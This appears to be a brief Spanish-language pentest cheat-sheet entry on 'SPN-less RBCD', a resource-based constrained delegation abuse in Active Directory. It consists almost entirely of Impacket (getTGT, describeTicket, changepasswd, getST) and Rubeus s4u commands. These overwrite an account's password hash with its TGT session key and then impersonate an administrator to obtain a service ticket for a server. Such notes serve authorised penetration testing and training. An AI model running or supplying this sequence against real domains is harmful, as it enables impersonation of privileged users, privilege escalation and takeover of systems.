SPN-less RBCD
getTGT.py -hashes :[HASH_NT_SPNLESS] [DOMINIO]/spnless@[IP_DC]describeTicket.py spnless.ccache | grep 'Ticket Session Key' Ticket Session Key: [CLAVE_SESION_TGT_COMO_HASH]changepasswd.py [DOMINIO]/spnless:[PASS_ANTIGUA]@[IP_DC] -newhash [CLAVE_SESION_TGT_COMO_HASH]KRB5CCNAME=spnless.ccache getST.py -u2u -impersonate [USUARIO_ADMIN] -spn host/[SERVIDOR_BACK_1] -k -no-pass [DOMINIO]/spnlessPS > .\Rubeus.exe s4u /u2u /user:spnless /rc4:[CLAVE_SESION_TGT_COMO_HASH] /impersonateuser:[USUARIO_ADMIN] /msdsspn:host/[SERVIDOR_BACK_1] /ptt
Última actualización